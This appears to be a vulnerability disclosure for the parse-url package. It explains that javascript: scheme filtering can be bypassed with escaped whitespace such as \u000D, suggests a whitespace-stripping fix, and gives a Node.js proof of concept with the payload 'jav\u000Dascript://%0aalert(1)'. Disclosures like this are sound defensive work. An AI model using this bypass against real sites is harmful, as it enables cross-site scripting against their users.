Description

We can Run malicious JS code With special escaping characters for ASCII chars that start with \x and also all Unicodes start with \u, like the followings :

CR == > \x0d and \u000d

LF == > \x0a and \u000a

TAB ==> \t and \u0009 and \x09

So there can be many characters that we can’t filter all of them!

Fix suggestion

I have a good and maybe a perfect fix solution:

parse-parse use the url = (url || "").replace(/\s/gmi, '') at this line of code to remove all Whitespace(also the encoded ones) from any part of string.

Proof of Concept

const http = require("http");
const parseUrl = require("parse-url");
const url =  parseUrl('jav\u000Dascript://%0aalert(1)');
console.log(url)
const server = http.createServer((request, response) => {
    response.writeHead(200);
    if (url.scheme !== "javascript" && url.scheme !== null) {
        response.end("<a href>Wowww!</a>" );
    }
    else{
        response.end("Nooo!");
    }
});
server.listen(80, "127.0.0.1",function(){
    console.log("http://"+this.address().address+":"+this.address().port);
});